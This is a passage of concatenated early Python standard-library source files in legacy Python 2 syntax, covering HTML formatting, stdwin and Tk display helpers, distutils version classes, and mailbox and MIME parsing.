def unknown_endtag(self, tag):
print '*** unknown </' + tag + '>'
# An extension of the formatting parser which formats anchors differently.
class AnchoringParser(FormattingParser):
def start_a(self, attrs):
FormattingParser.start_a(self, attrs)
if self.inanchor:
self.fmt.bgn_anchor(self.inanchor)
def end_a(self):
if self.inanchor:
self.fmt.end_anchor(self.inanchor)
self.inanchor = 0
# Style sheet -- this is never instantiated, but the attributes
# of the class object itself are used to specify fonts to be used
# for various paragraph styles.
# A font set is a non-empty list of fonts, in the order:
# [roman, italic, bold, fixed].
# When a style is not available the nearest lower style is used
ROMAN = 0
ITALIC = 1
BOLD = 2
FIXED = 3
class NullStylesheet:
# Fonts -- none
stdfontset = [None]
h1fontset = [None]
h2fontset = [None]
h3fontset = [None]
# Indents
stdindent = 2
ddindent = 25
ulindent = 4
h1indent = 0
h2indent = 0
literalindent = 0
class X11Stylesheet(NullStylesheet):
stdfontset = [ \
'-*-helvetica-medium-r-normal-*-*-100-100-*-*-*-*-*', \
'-*-helvetica-medium-o-normal-*-*-100-100-*-*-*-*-*', \
'-*-helvetica-bold-r-normal-*-*-100-100-*-*-*-*-*', \
'-*-courier-medium-r-normal-*-*-100-100-*-*-*-*-*', \
]
h1fontset = [ \
'-*-helvetica-medium-r-normal-*-*-180-100-*-*-*-*-*', \
'-*-helvetica-medium-o-normal-*-*-180-100-*-*-*-*-*', \
'-*-helvetica-bold-r-normal-*-*-180-100-*-*-*-*-*', \
]
h2fontset = [ \
'-*-helvetica-medium-r-normal-*-*-140-100-*-*-*-*-*', \
'-*-helvetica-medium-o-normal-*-*-140-100-*-*-*-*-*', \
'-*-helvetica-bold-r-normal-*-*-140-100-*-*-*-*-*', \
]
h3fontset = [ \
'-*-helvetica-medium-r-normal-*-*-120-100-*-*-*-*-*', \
'-*-helvetica-medium-o-normal-*-*-120-100-*-*-*-*-*', \
'-*-helvetica-bold-r-normal-*-*-120-100-*-*-*-*-*', \
]
ddindent = 40
class MacStylesheet(NullStylesheet):
stdfontset = [ \
('Geneva', 'p', 10), \
('Geneva', 'i', 10), \
('Geneva', 'b', 10), \
('Monaco', 'p', 10), \
]
h1fontset = [ \
('Geneva', 'p', 18), \
('Geneva', 'i', 18), \
('Geneva', 'b', 18), \
('Monaco', 'p', 18), \
]
h3fontset = [ \
('Geneva', 'p', 14), \
('Geneva', 'i', 14), \
('Geneva', 'b', 14), \
('Monaco', 'p', 14), \
]
h3fontset = [ \
('Geneva', 'p', 12), \
('Geneva', 'i', 12), \
('Geneva', 'b', 12), \
('Monaco', 'p', 12), \
]
if os.name == 'mac':
StdwinStylesheet = MacStylesheet
else:
StdwinStylesheet = X11Stylesheet
class GLStylesheet(NullStylesheet):
stdfontset = [ \
'Helvetica 10', \
'Helvetica-Italic 10', \
'Helvetica-Bold 10', \
'Courier 10', \
]
h1fontset = [ \
'Helvetica 18', \
'Helvetica-Italic 18', \
'Helvetica-Bold 18', \
'Courier 18', \
]
h2fontset = [ \
'Helvetica 14', \
'Helvetica-Italic 14', \
'Helvetica-Bold 14', \
'Courier 14', \
]
h3fontset = [ \
'Helvetica 12', \
'Helvetica-Italic 12', \
'Helvetica-Bold 12', \
'Courier 12', \
]
# Test program -- produces no output but times how long it takes
# to send a document to a null formatter, exclusive of I/O
def test():
import fmt
import time
import urllib
if sys.argv[1:]: file = sys.argv[1]
else: file = 'test.html'
data = urllib.urlopen(file).read()
t0 = time.time()
fmtr = fmt.WritingFormatter(sys.stdout, 79)
p = FormattingParser(fmtr, NullStylesheet)
p.feed(data)
p.close()
t1 = time.time()
print
print '*** Formatting time:', round(t1-t0, 3), 'seconds.'
# Test program using stdwin
def testStdwin():
import stdwin, fmt
from stdwinevents import *
if sys.argv[1:]: file = sys.argv[1]
else: file = 'test.html'
data = open(file, 'r').read()
window = stdwin.open('testStdwin')
b = None
while 1:
etype, ewin, edetail = stdwin.getevent()
if etype == WE_CLOSE:
break
if etype == WE_SIZE:
window.setdocsize(0, 0)
window.setorigin(0, 0)
window.change((0, 0), (10000, 30000)) # XXX
if etype == WE_DRAW:
if not b:
b = fmt.StdwinBackEnd(window, 1)
f = fmt.BaseFormatter(b.d, b)
p = FormattingParser(f, \
MacStylesheet)
p.feed(data)
p.close()
b.finish()
else:
b.redraw(edetail)
window.close()
# Test program using GL
def testGL():
import gl, GL, fmt
if sys.argv[1:]: file = sys.argv[1]
else: file = 'test.html'
data = open(file, 'r').read()
W, H = 600, 600
gl.foreground()
gl.prefsize(W, H)
wid = gl.winopen('testGL')
gl.ortho2(0, W, H, 0)
gl.color(GL.WHITE)
gl.clear()
gl.color(GL.BLACK)
b = fmt.GLBackEnd(wid)
f = fmt.BaseFormatter(b.d, b)
p = FormattingParser(f, GLStylesheet)
p.feed(data)
p.close()
b.finish()
#
import time
time.sleep(5)
if __name__ == '__main__':
test()
```
#### File: tkinter/www/tkfmt.py
```python
debug = 0
from fmt import *
class TkFormatter:
def __init__(self, text):
self.text = text # The text widget to draw in
self.nospace = 1
self.blanklines = 0
self.font = ''
# Methods called by htmllib.FormattingParser:
def setfont(self, font):
if 1 or debug: print "setfont(%s)" % `font`
self.font = font
def resetfont(self):
if debug: print "resetfont()"
self.font = ''
def flush(self):
if debug: print "flush()"
self.needvspace(1)
def setleftindent(self, n):
if debug: print "setleftindent(%d)" % n
def needvspace(self, n):
if debug: print "needvspace(%d)" % n
self.blanklines = max(n, self.blanklines)
self.nospace = 1
def addword(self, word, nspaces):
if debug: print "addword(%s, %d)" % (`word`, nspaces)
if self.nospace and not word:
return
if self.blanklines > 0:
word = '\n'*self.blanklines + word
self.blanklines = 0
self.nospace = 0
here = self.text.index('end')
self.text.insert('end', word + nspaces*' ')
if not self.font:
self.tag_remo
def setjust(self, c):
if debug: print "setjust(%s)" % `c`
def bgn_anchor(self):
if debug: print "bgn_anchor()"
def end_anchor(self):
if debug: print "end_anchor()"
def hrule(self):
if debug: print "hrule()"
self.flush()
self.addword('_'*60, 0)
self.flush()
```
#### File: tools/sgmlconv/esistools.py
```python
__version__ = '$Revision$'
import re
import string
import sys
_data_rx = re.compile(r"[^\\][^\\]*")
def decode(s):
r = ''
while s:
m = _data_rx.match(s)
if m:
r = r + m.group()
s = s[len(m.group()):]
elif s[1] == "\\":
r = r + "\\"
s = s[2:]
elif s[1] == "n":
r = r + "\n"
s = s[2:]
else:
raise ValueError, "can't handle " + `s`
return r
_charmap = {}
for c in map(chr, range(256)):
_charmap[c] = c
_charmap["\n"] = r"\n"
_charmap["\\"] = r"\\"
del c
def encode(s):
return string.join(map(_charmap.get, s), '')
import xml.dom.esis_builder
class ExtendedEsisBuilder(xml.dom.esis_builder.EsisBuilder):
def __init__(self, *args, **kw):
self.__empties = {}
self.__is_empty = 0
apply(xml.dom.esis_builder.EsisBuilder.__init__, (self,) + args, kw)
def feed(self, data):
for line in string.split(data, '\n'):
if not line:
break
event = line[0]
text = line[1:]
if event == '(':
element = self.document.createElement(text, self.attr_store)
self.attr_store = {}
self.push(element)
if self.__is_empty:
self.__empties[text] = text
self.__is_empty = 0
elif event == ')':
self.pop()
elif event == 'A':
l = re.split(' ', text, 2)
name = l[0]
value = decode(l[2])
self.attr_store[name] = value
elif event == '-':
text = self.document.createText(decode(text))
self.push(text)
elif event == 'C':
return
elif event == 'e':
self.__is_empty = 1
else:
sys.stderr.write('Unknown event: %s\n' % line)
def get_empties(self):
return self.__empties.keys()
```
#### File: distutils/command/install_py.py
```python
__rcsid__ = "$Id$"
import sys
from distutils.core import Command
from distutils.util import copy_tree
class InstallPy (Command):
options = [('dir=', 'd', "directory to install to"),
('build-dir=' 'b', "build directory (where to install from)")]
def set_default_options (self):
# let the 'install' command dictate our installation directory
self.dir = None
self.build_dir = None
def set_final_options (self):
# If we don't have a 'dir' value, we'll have to ask the 'install'
# command for one. (This usually means the user ran 'install_py'
# directly, rather than going through 'install' -- so in reality,
# 'find_command_obj()' will create an 'install' command object,
# which we then query.
self.set_undefined_options ('install',
('build_lib', 'build_dir'),
('install_site_lib', 'dir'))
def run (self):
self.set_final_options ()
# Dump entire contents of the build directory to the installation
# directory (that's the beauty of having a build directory!)
self.copy_tree (self.build_dir, self.dir)
# run ()
# class InstallPy
```
#### File: Lib/distutils/version.py
```python
import string, re
from types import StringType
class Version:
"""Abstract base class for version numbering classes. Just provides
constructor (__init__) and reproducer (__repr__), because those
seem to be the same for all version numbering classes.
"""
def __init__ (self, vstring=None):
if vstring:
self.parse (vstring)
def __repr__ (self):
return "%s ('%s')" % (self.__class__.__name__, str (self))
# Interface for version-number classes -- must be implemented
# by the following classes (the concrete ones -- Version should
# be treated as an abstract class).
# __init__ (string) - create and take same action as 'parse'
# (string parameter is optional)
# parse (string) - convert a string representation to whatever
# internal representation is appropriate for
# this style of version numbering
# __str__ (self) - convert back to a string; should be very similar
# (if not identical to) the string supplied to parse
# __repr__ (self) - generate Python code to recreate
# the instance
# __cmp__ (self, other) - compare two version numbers ('other' may
# be an unparsed version string, or another
# instance of your version class)
class StrictVersion (Version):
"""Version numbering for anal retentives and software idealists.
Implements the standard interface for version number classes as
described above. A version number consists of two or three
dot-separated numeric components, with an optional "pre-release" tag
on the end. The pre-release tag consists of the letter 'a' or 'b'
followed by a number. If the numeric components of two version
numbers are equal, then one with a pre-release tag will always
be deemed earlier (lesser) than one without.
The following are valid version numbers (shown in the order that
would be obtained by sorting according to the supplied cmp function):
0.4 0.4.0 (these two are equivalent)
0.4.1
0.5a1
0.5b3
0.5
0.9.6
1.0
1.0.4a3
1.0.4b1
1.0.4
The following are examples of invalid version numbers:
1
2.7.2.2
1.3.a4
1.3pl1
1.3c4
The rationale for this version numbering system will be explained
in the distutils documentation.
"""
version_re = re.compile (r'^(\d+) \. (\d+) (\. (\d+))? ([ab](\d+))?$',
re.VERBOSE)
def parse (self, vstring):
match = self.version_re.match (vstring)
if not match:
raise ValueError, "invalid version number '%s'" % vstring
(major, minor, patch, prerelease, prerelease_num) = \
match.group (1, 2, 4, 5, 6)
if patch:
self.version = tuple (map (string.atoi, [major, minor, patch]))
else:
self.version = tuple (map (string.atoi, [major, minor]) + [0])
if prerelease:
self.prerelease = (prerelease[0], string.atoi (prerelease_num))
else:
self.prerelease = None
def __str__ (self):
if self.version[2] == 0:
vstring = string.join (map (str, self.version[0:2]), '.')
else:
vstring = string.join (map (str, self.version), '.')
if self.prerelease:
vstring = vstring + self.prerelease[0] + str (self.prerelease[1])
return vstring
def __cmp__ (self, other):
if isinstance (other, StringType):
other = StrictVersion (other)
compare = cmp (self.version, other.version)
if (compare == 0): # have to compare prerelease
# case 1: neither has prerelease; they're equal
# case 2: self has prerelease, other doesn't; other is greater
# case 3: self doesn't have prerelease, other does: self is greater
# case 4: both have prerelease: must compare them!
if (not self.prerelease and not other.prerelease):
return 0
elif (self.prerelease and not other.prerelease):
return -1
elif (not self.prerelease and other.prerelease):
return 1
elif (self.prerelease and other.prerelease):
return cmp (self.prerelease, other.prerelease)
else: # numeric versions don't match --
return compare # prerelease stuff doesn't matter
# end class StrictVersion
# The rules according to <NAME>:
# 1) a version number has 1 or more numbers separate by a period or by
# sequences of letters. If only periods, then these are compared
# left-to-right to determine an ordering.
# 2) sequences of letters are part of the tuple for comparison and are
# compared lexicographically
# 3) recognize the numeric components may have leading zeroes
#
# The LooseVersion class below implements these rules: a version number
# string is split up into a tuple of integer and string components, and
# comparison is a simple tuple comparison. This means that version
# numbers behave in a predictable and obvious way, but a way that might
# not necessarily be how people *want* version numbers to behave. There
# wouldn't be a problem if people could stick to purely numeric version
# numbers: just split on period and compare the numbers as tuples.
# However, people insist on putting letters into their version numbers;
# the most common purpose seems to be:
# - indicating a "pre-release" version
# ('alpha', 'beta', 'a', 'b', 'pre', 'p')
# - indicating a post-release patch ('p', 'pl', 'patch')
# but of course this can't cover all version number schemes, and there's
# no way to know what a programmer means without asking him.
#
# The problem is what to do with letters (and other non-numeric
# characters) in a version number. The current implementation does the
# obvious and predictable thing: keep them as strings and compare
# lexically within a tuple comparison. This has the desired effect if
# an appended letter sequence implies something "post-release":
# eg. "0.99" < "0.99pl14" < "1.0", and "5.001" < "5.001m" < "5.002".
#
# However, if letters in a version number imply a pre-release version,
# the "obvious" thing isn't correct. Eg. you would expect that
# "1.5.1" < "1.5.2a2" < "1.5.2", but under the tuple/lexical comparison
# implemented here, this just isn't so.
#
# Two possible solutions come to mind. The first is to tie the
# comparison algorithm to a particular set of semantic rules, as has
# been done in the StrictVersion class above. This works great as long
# as everyone can go along with bondage and discipline. Hopefully a
# (large) subset of Python module programmers will agree that the
# particular flavour of bondage and discipline provided by StrictVersion
# provides enough benefit to be worth using, and will submit their
# version numbering scheme to its domination. The free-thinking
# anarchists in the lot will never give in, though, and something needs
# to be done to accomodate them.
#
# Perhaps a "moderately strict" version class could be implemented that
# lets almost anything slide (syntactically), and makes some heuristic
# assumptions about non-digits in version number strings. This could
# sink into special-case-hell, though; if I was as talented and
# idiosyncratic as <NAME>, I'd go ahead and implement a class that
# somehow knows that "1.2.1" < "1.2.2a2" < "1.2.2" < "1.2.2pl3", and is
# just as happy dealing with things like "2g6" and "1.13++". I don't
# think I'm smart enough to do it right though.
#
# In any case, I've coded the test suite for this module (see
# ../test/test_version.py) specifically to fail on things like comparing
# "1.2a2" and "1.2". That's not because the *code* is doing anything
# wrong, it's because the simple, obvious design doesn't match my
# complicated, hairy expectations for real-world version numbers. It
# would be a snap to fix the test suite to say, "Yep, LooseVersion does
# the Right Thing" (ie. the code matches the conception). But I'd rather
# have a conception that matches common notions about version numbers.
class LooseVersion (Version):
"""Version numbering for anarchists and software realists.
Implements the standard interface for version number classes as
described above. A version number consists of a series of numbers,
separated by either periods or strings of letters. When comparing
version numbers, the numeric components will be compared
numerically, and the alphabetic components lexically. The following
are all valid version numbers, in no particular order:
1.5.1
1.5.2b2
161
3.10a
8.02
3.4j
1996.07.12
3.2.pl0
3.1.1.6
2g6
11g
0.960923
2.2beta29
1.13++
5.5.kw
2.0b1pl0
In fact, there is no such thing as an invalid version number under
this scheme; the rules for comparison are simple and predictable,
but may not always give the results you want (for some definition
of "want").
"""
component_re = re.compile(r'(\d+ | [a-z]+ | \.)', re.VERBOSE)
def __init__ (self, vstring=None):
if vstring:
self.parse (vstring)
def parse (self, vstring):
# I've given up on thinking I can reconstruct the version string
# from the parsed tuple -- so I just store the string here for
# use by __str__
self.vstring = vstring
components = filter (lambda x: x and x != '.',
self.component_re.split (vstring))
for i in range (len (components)):
try:
components[i] = int (components[i])
except ValueError:
pass
self.version = components
def __str__ (self):
return self.vstring
def __repr__ (self):
return "LooseVersion ('%s')" % str (self)
def __cmp__ (self, other):
if isinstance (other, StringType):
other = LooseVersion (other)
return cmp (self.version, other.version)
# end class LooseVersion
```
#### File: Lib/lib-stdwin/formatter.py
```python
class formatter:
#
# Initialize a formatter instance.
# Pass the window's drawing object, and left, top, right
# coordinates of the drawing space as arguments.
#
def __init__(self, d, left, top, right):
self.d = d # Drawing object
self.left = left # Left margin
self.right = right # Right margin
self.v = top # Top of current line
self.center = 0
self.justify = 1
self.setfont('') # Default font
self._reset() # Prepare for new line
#
# Reset for start of fresh line.
#
def _reset(self):
self.boxes = [] # Boxes and glue still to be output
self.sum_width = 0 # Total width of boxes
self.sum_space = 0 # Total space between boxes
self.sum_stretch = 0 # Total stretch for space between boxes
self.max_ascent = 0 # Max ascent of current line
self.max_descent = 0 # Max descent of current line
self.avail_width = self.right - self.left
self.hang_indent = 0
#
# Set the current font, and compute some values from it.
#
def setfont(self, font):
self.font = font
self.d.setfont(font)
self.font_space = self.d.textwidth(' ')
self.font_ascent = self.d.baseline()
self.font_descent = self.d.lineheight() - self.font_ascent
#
# Add a word to the list of boxes; first flush if line is full.
# Space and stretch factors are expressed in fractions
# of the current font's space width.
# (Two variations: one without, one with explicit stretch factor.)
#
def addword(self, word, spacefactor):
self.addwordstretch(word, spacefactor, spacefactor)
#
def addwordstretch(self, word, spacefactor, stretchfactor):
width = self.d.textwidth(word)
if width > self.avail_width:
self._flush(1)
space = int(float(self.font_space) * float(spacefactor))
stretch = int(float(self.font_space) * float(stretchfactor))
box = (self.font, word, width, space, stretch)
self.boxes.append(box)
self.sum_width = self.sum_width + width
self.sum_space = self.sum_space + space
self.sum_stretch = self.sum_stretch + stretch
self.max_ascent = max(self.font_ascent, self.max_ascent)
self.max_descent = max(self.font_descent, self.max_descent)
self.avail_width = self.avail_width - width - space
#
# Flush current line and start a new one.
# Flushing twice is harmless (i.e. does not introduce a blank line).
# (Two versions: the internal one has a parameter for justification.)
#
def flush(self):
self._flush(0)
#
def _flush(self, justify):
if not self.boxes:
return
#
# Compute amount of stretch needed.
#
if justify and self.justify or self.center:
#
# Compute extra space to fill;
# this is avail_width plus glue from last box.
# Also compute available stretch.
#
last_box = self.boxes[len(self.boxes)-1]
font, word, width, space, stretch = last_box
tot_extra = self.avail_width + space
tot_stretch = self.sum_stretch - stretch
else:
tot_extra = tot_stretch = 0
#
# Output the boxes.
#
baseline = self.v + self.max_ascent
h = self.left + self.hang_indent
if self.center:
h = h + tot_extra / 2
tot_extra = tot_stretch = 0
for font, word, width, space, stretch in self.boxes:
self.d.setfont(font)
v = baseline - self.d.baseline()
self.d.text((h, v), word)
h = h + width + space
if tot_extra > 0 and tot_stretch > 0:
extra = stretch * tot_extra / tot_stretch
h = h + extra
tot_extra = tot_extra - extra
tot_stretch = tot_stretch - stretch
#
# Prepare for next line.
#
self.v = baseline + self.max_descent
self.d.setfont(self.font)
self._reset()
#
# Add vertical space; first flush.
# Vertical space is expressed in fractions of the current
# font's line height.
#
def vspace(self, lines):
self.vspacepixels(int(lines * self.d.lineheight()))
#
# Add vertical space given in pixels.
#
def vspacepixels(self, dv):
self.flush()
self.v = self.v + dv
#
# Set temporary (hanging) indent, for paragraph start.
# First flush.
#
def tempindent(self, space):
self.flush()
hang = int(float(self.font_space) * float(space))
self.hang_indent = hang
self.avail_width = self.avail_width - hang
#
# Add (permanent) left indentation. First flush.
#
def addleftindent(self, space):
self.flush()
self.left = self.left \
+ int(float(self.font_space) * float(space))
self._reset()
#
# Test procedure
#
def test():
import stdwin, stdwinq
from stdwinevents import *
try:
import mac
# Mac font assignments:
font1 = 'times', '', 12
font2 = 'times', 'b', 14
except ImportError:
# X11R4 font assignments
font1 = '*times-medium-r-*-120-*'
font2 = '*times-bold-r-*-140-*'
words = \
['The','quick','brown','fox','jumps','over','the','lazy','dog.']
words = words * 2
stage = 0
stages = [(0,0,'ragged'), (1,0,'justified'), (0,1,'centered')]
justify, center, title = stages[stage]
stdwin.setdefwinsize(300,200)
w = stdwin.open(title)
winsize = w.getwinsize()
while 1:
type, window, detail = stdwinq.getevent()
if type == WE_CLOSE:
break
elif type == WE_SIZE:
newsize = w.getwinsize()
if newsize <> winsize:
w.change((0,0), winsize)
winsize = newsize
w.change((0,0), winsize)
elif type == WE_MOUSE_DOWN:
stage = (stage + 1) % len(stages)
justify, center, title = stages[stage]
w.settitle(title)
w.change((0, 0), (1000, 1000))
elif type == WE_DRAW:
width, height = winsize
f = formatter(w.begindrawing(), 0, 0, width)
f.center = center
f.justify = justify
if not center:
f.tempindent(5)
for font in font1, font2, font1:
f.setfont(font)
for word in words:
space = 1 + (word[-1:] == '.')
f.addword(word, space)
if center and space > 1:
f.flush()
f.flush()
height = f.v
del f
w.setdocsize(0, height)
```
#### File: Lib/lib-stdwin/gwin.py
```python
import stdwin, stdwinq
from stdwinevents import *
from mainloop import mainloop, register, unregister, windows
# Open a window
def open(title): # Open a generic window
w = stdwin.open(title)
stdwin.setdefwinsize(0, 0)
# Set default event handlers
w.draw = nop
w.char = nop
w.mdown = nop
w.mmove = nop
w.mup = nop
w.m2down = m2down
w.m2up = m2up
w.size = nop
w.move = nop
w.activate = w.deactivate = nop
w.timer = nop
# default command handlers
w.close = close
w.tab = tab
w.enter = enter
w.backspace = backspace
w.arrow = arrow
w.kleft = w.kup = w.kright = w.kdown = nop
w.dispatch = treatevent
register(w)
return w
def treatevent(e): # Handle a stdwin event
type, w, detail = e
if type == WE_DRAW:
w.draw(w, detail)
elif type == WE_MENU:
m, item = detail
m.action[item](w, m, item)
elif type == WE_COMMAND:
treatcommand(w, detail)
elif type == WE_CHAR:
w.char(w, detail)
elif type == WE_MOUSE_DOWN:
if detail[1] > 1: w.m2down(w, detail)
else: w.mdown(w, detail)
elif type == WE_MOUSE_MOVE:
w.mmove(w, detail)
elif type == WE_MOUSE_UP:
if detail[1] > 1: w.m2up(w, detail)
else: w.mup(w, detail)
elif type == WE_SIZE:
w.size(w, w.getwinsize())
elif type == WE_ACTIVATE:
w.activate(w)
elif type == WE_DEACTIVATE:
w.deactivate(w)
elif type == WE_MOVE:
w.move(w)
elif type == WE_TIMER:
w.timer(w)
elif type == WE_CLOSE:
w.close(w)
def treatcommand(w, type): # Handle a we_command event
if type == WC_CLOSE:
w.close(w)
elif type == WC_RETURN:
w.enter(w)
elif type == WC_TAB:
w.tab(w)
elif type == WC_BACKSPACE:
w.backspace(w)
elif type in (WC_LEFT, WC_UP, WC_RIGHT, WC_DOWN):
w.arrow(w, type)
# Methods
def close(w): # Close method
unregister(w)
del w.close # Delete our close function
w.close() # Call the close method
def arrow(w, detail): # Arrow key method
if detail == WC_LEFT:
w.kleft(w)
elif detail == WC_UP:
w.kup(w)
elif detail == WC_RIGHT:
w.kright(w)
elif detail == WC_DOWN:
w.kdown(w)
# Trivial methods
def tab(w): w.char(w, '\t')
def enter(w): w.char(w, '\n') # 'return' is a Python reserved word
def backspace(w): w.char(w, '\b')
def m2down(w, detail): w.mdown(w, detail)
def m2up(w, detail): w.mup(w, detail)
def nop(*args): pass
```
#### File: Lib/lib-stdwin/stdwinq.py
```python
import stdwin
# Events read ahead are stored in this queue.
#
queue = []
# Replacement for getevent().
#
def getevent():
if queue:
event = queue[0]
del queue[0]
return event
else:
return stdwin.getevent()
# Replacement for pollevent().
#
def pollevent():
if queue:
return getevent()
else:
return stdwin.pollevent()
# Push an event back in the queue.
#
def ungetevent(event):
queue.insert(0, event)
# Synchronize the display. It turns out that this is the way to
# force STDWIN to call XSync(), which some (esoteric) applications need.
# (This is stronger than just flushing -- it actually waits for a
# positive response from the X server on the last command issued.)
#
def sync():
while 1:
event = stdwin.pollevent()
if not event: break
queue.append(event)
```
#### File: Lib/lib-tk/tkFileDialog.py
```python
from tkCommonDialog import Dialog
class _Dialog(Dialog):
def _fixoptions(self):
try:
# make sure "filetypes" is a tuple
self.options["filetypes"] = tuple(self.options["filetypes"])
except KeyError:
pass
def _fixresult(self, widget, result):
if result:
# keep directory and filename until next time
import os
path, file = os.path.split(result)
self.options["initialdir"] = path
self.options["initialfile"] = file
self.filename = result # compatibility
return result
#
# file dialogs
class Open(_Dialog):
"Ask for a filename to open"
command = "tk_getOpenFile"
class SaveAs(_Dialog):
"Ask for a filename to save as"
command = "tk_getSaveFile"
#
# convenience stuff
def askopenfilename(**options):
"Ask for a filename to open"
return apply(Open, (), options).show()
def asksaveasfilename(**options):
"Ask for a filename to save as"
return apply(SaveAs, (), options).show()
# FIXME: are the following two perhaps a bit too convenient?
def askopenfile(mode = "r", **options):
"Ask for a filename to open, and returned the opened file"
filename = apply(Open, (), options).show()
if filename:
return open(filename, mode)
return None
def asksaveasfile(mode = "w", **options):
"Ask for a filename to save as, and returned the opened file"
filename = apply(SaveAs, (), options).show()
if filename:
return open(filename, mode)
return None
# --------------------------------------------------------------------
# test stuff
if __name__ == "__main__":
print "open", askopenfilename(filetypes=[("all filez", "*")])
print "saveas", asksaveasfilename()
```
#### File: cpython/Lib/mailbox.py
```python
import rfc822
import os
class _Mailbox:
def __init__(self, fp):
self.fp = fp
self.seekp = 0
def seek(self, pos, whence=0):
if whence==1: # Relative to current position
self.pos = self.pos + pos
if whence==2: # Relative to file's end
self.pos = self.stop + pos
else: # Default - absolute position
self.pos = self.start + pos
def next(self):
while 1:
self.fp.seek(self.seekp)
try:
self._search_start()
except EOFError:
self.seekp = self.fp.tell()
return None
start = self.fp.tell()
self._search_end()
self.seekp = stop = self.fp.tell()
if start <> stop:
break
return rfc822.Message(_Subfile(self.fp, start, stop))
class _Subfile:
def __init__(self, fp, start, stop):
self.fp = fp
self.start = start
self.stop = stop
self.pos = self.start
def read(self, length = None):
if self.pos >= self.stop:
return ''
remaining = self.stop - self.pos
if length is None or length < 0:
length = remaining
elif length > remaining:
length = remaining
self.fp.seek(self.pos)
data = self.fp.read(length)
self.pos = self.fp.tell()
return data
def readline(self, length = None):
if self.pos >= self.stop:
return ''
if length is None:
length = self.stop - self.pos
self.fp.seek(self.pos)
data = self.fp.readline(length)
self.pos = self.fp.tell()
return data
def readlines(self, sizehint = -1):
lines = []
while 1:
line = self.readline()
if not line:
break
lines.append(line)
if sizehint >= 0:
sizehint = sizehint - len(line)
if sizehint <= 0:
break
return lines
def tell(self):
return self.pos - self.start
def seek(self, pos, whence=0):
if whence == 0:
self.pos = self.start + pos
elif whence == 1:
self.pos = self.pos + pos
elif whence == 2:
self.pos = self.stop + pos
def close(self):
del self.fp
class UnixMailbox(_Mailbox):
def _search_start(self):
while 1:
line = self.fp.readline()
if not line:
raise EOFError
if line[:5] == 'From ' and self._isrealfromline(line):
return
def _search_end(self):
while 1:
pos = self.fp.tell()
line = self.fp.readline()
if not line:
return
if line[:5] == 'From ' and self._isrealfromline(line):
self.fp.seek(pos)
return
# An overridable mechanism to test for From-line-ness.
# You can either specify a different regular expression
# or define a whole new _isrealfromline() method.
# Note that this only gets called for lines starting with
# the 5 characters "From ".
_fromlinepattern = r"From \s*[^\s]+\s+\w\w\w\s+\w\w\w\s+\d?\d\s+" \
r"\d?\d:\d\d(:\d\d)?(\s+[^\s]+)?\s+\d\d\d\d\s*$"
_regexp = None
def _isrealfromline(self, line):
if not self._regexp:
import re
self._regexp = re.compile(self._fromlinepattern)
return self._regexp.match(line)
class MmdfMailbox(_Mailbox):
def _search_start(self):
while 1:
line = self.fp.readline()
if not line:
raise EOFError
if line[:5] == '\001\001\001\001\n':
return
def _search_end(self):
while 1:
pos = self.fp.tell()
line = self.fp.readline()
if not line:
return
if line == '\001\001\001\001\n':
self.fp.seek(pos)
return
class MHMailbox:
def __init__(self, dirname):
import re
pat = re.compile('^[0-9][0-9]*$')
self.dirname = dirname
files = os.listdir(self.dirname)
self.boxes = []
for f in files:
if pat.match(f):
self.boxes.append(f)
def next(self):
if not self.boxes:
return None
fn = self.boxes[0]
del self.boxes[0]
fp = open(os.path.join(self.dirname, fn))
return rfc822.Message(fp)
class Maildir:
# Qmail directory mailbox
def __init__(self, dirname):
import string
self.dirname = dirname
self.boxes = []
# check for new mail
newdir = os.path.join(self.dirname, 'new')
for file in os.listdir(newdir):
if len(string.split(file, '.')) > 2:
self.boxes.append(os.path.join(newdir, file))
# Now check for current mail in this maildir
curdir = os.path.join(self.dirname, 'cur')
for file in os.listdir(curdir):
if len(string.split(file, '.')) > 2:
self.boxes.append(os.path.join(curdir, file))
def next(self):
if not self.boxes:
return None
fn = self.boxes[0]
del self.boxes[0]
fp = open(os.path.join(self.dirname, fn))
return rfc822.Message(fp)
class BabylMailbox(_Mailbox):
def _search_start(self):
while 1:
line = self.fp.readline()
if not line:
raise EOFError
if line == '*** EOOH ***\n':
return
def _search_end(self):
while 1:
pos = self.fp.tell()
line = self.fp.readline()
if not line:
return
if line == '\037\014\n':
self.fp.seek(pos)
return
def _test():
import time
import sys
import string
import os
args = sys.argv[1:]
if not args:
for key in 'MAILDIR', 'MAIL', 'LOGNAME', 'USER':
if os.environ.has_key(key):
mbox = os.environ[key]
break
else:
print "$MAIL, $LOGNAME nor $USER set -- who are you?"
return
else:
mbox = args[0]
if mbox[:1] == '+':
mbox = os.environ['HOME'] + '/Mail/' + mbox[1:]
elif not '/' in mbox:
mbox = '/usr/mail/' + mbox
if os.path.isdir(mbox):
if os.path.isdir(os.path.join(mbox, 'cur')):
mb = Maildir(mbox)
else:
mb = MHMailbox(mbox)
else:
fp = open(mbox, 'r')
mb = UnixMailbox(fp)
msgs = []
while 1:
msg = mb.next()
if msg is None:
break
msgs.append(msg)
msg.fp = None
if len(args) > 1:
num = string.atoi(args[1])
print 'Message %d body:'%num
msg = msgs[num-1]
msg.rewindbody()
sys.stdout.write(msg.fp.read())
else:
print 'Mailbox',mbox,'has',len(msgs),'messages:'
for msg in msgs:
f = msg.getheader('from') or ""
s = msg.getheader('subject') or ""
d = msg.getheader('date') or ""
print '%20.20s %18.18s %-30.30s'%(f, d[5:], s)
if __name__ == '__main__':
_test()
```
#### File: cpython/Lib/mimetools.py
```python
import os
import rfc822
import string
import tempfile
# A derived class of rfc822.Message that knows about MIME headers and
# contains some hooks for decoding encoded and multipart messages.
class Message(rfc822.Message):
def __init__(self, fp, seekable = 1):
rfc822.Message.__init__(self, fp, seekable)
self.encodingheader = \
self.getheader('content-transfer-encoding')
self.typeheader = \
self.getheader('content-type')
self.parsetype()
self.parseplist()
def parsetype(self):
str = self.typeheader
if str == None:
str = 'text/plain'
if ';' in str:
i = string.index(str, ';')
self.plisttext = str[i:]
str = str[:i]
else:
self.plisttext = ''
fields = string.splitfields(str, '/')
for i in range(len(fields)):
fields[i] = string.lower(string.strip(fields[i]))
self.type = string.joinfields(fields, '/')
self.maintype = fields[0]
self.subtype = string.joinfields(fields[1:], '/')
def parseplist(self):
str = self.plisttext
self.plist = []
while str[:1] == ';':
str = str[1:]
if ';' in str:
# XXX Should parse quotes!
end = string.index(str, ';')
else:
end = len(str)
f = str[:end]
if '=' in f:
i = string.index(f, '=')
f = string.lower(string.strip(f[:i])) + \
'=' + string.strip(f[i+1:])
self.plist.append(string.strip(f))
str = str[end:]
def getplist(self):
return self.plist
def getparam(self, name):
name = string.lower(name) + '='
